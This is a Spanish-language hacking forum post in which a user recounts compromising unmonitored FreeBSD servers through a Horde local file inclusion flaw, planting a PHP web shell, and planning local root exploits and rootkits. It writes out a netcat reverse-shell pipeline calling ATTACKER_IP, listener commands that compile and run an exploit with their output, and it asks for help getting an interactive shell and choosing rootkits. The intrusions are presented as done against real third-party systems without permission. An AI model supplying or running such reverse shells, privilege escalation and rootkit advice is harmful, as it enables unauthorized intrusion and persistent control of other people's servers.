Backdoor en FreeBSD

Iniciado por benn, 21 Febrero 2011, 09:03 AM

0 Miembros y 1 Visitante están viendo este tema.

benn

Que tal!

En los ultimos dias he encontrado targets interesantes que sufren de esta vuln LFI: http://packetstormsecurity.org/files/view/98424/horde-lfi.txt

He logrado subir una shell PHP sencilla (passthru) y ejecutar comandos basicos bajo el usuario web (www).

Afortunadamente muchos de estos sistemas (todos FreeBSD) son raramente monitoreados y por lo tanto muchos no estan actualizados, por lo que tienen bastantes local root exploits que pueden ser ejecutados para posteriormente meterles un rootkit.

Desafortunadamente no he podido obtener una shell interactiva en el servidor, he intentado con el Netcat que trae el FreeBSD para hacer una Reverse Shell pero inmediatamente despues de ejecutar el comando me desconecta:




Victim:


nc ATTACKER_IP 1234 | /bin/sh | nc ATTACKER_IP 2345





Attacker 1:


echo "gcc exploit.c ; echo "Compilado" ; ./a.out ; id" | nc -lvvp 1234
Connection terminated ...





Attacker 2:


nc -lvvp 2345
Compilado
uid=80(www) gid=80(www) groups=80(www)
Connection terminated ...






Me imagino que el problema es con el netcat que trae el FreeBSD, mi consulta seria la siguiente:

1) Como puedo obtener una shell interactica? Compilando o subiendo un netcat propio?
2) Que rootkits recomiendan para FreeBSD?

De antemano gracias, saludos!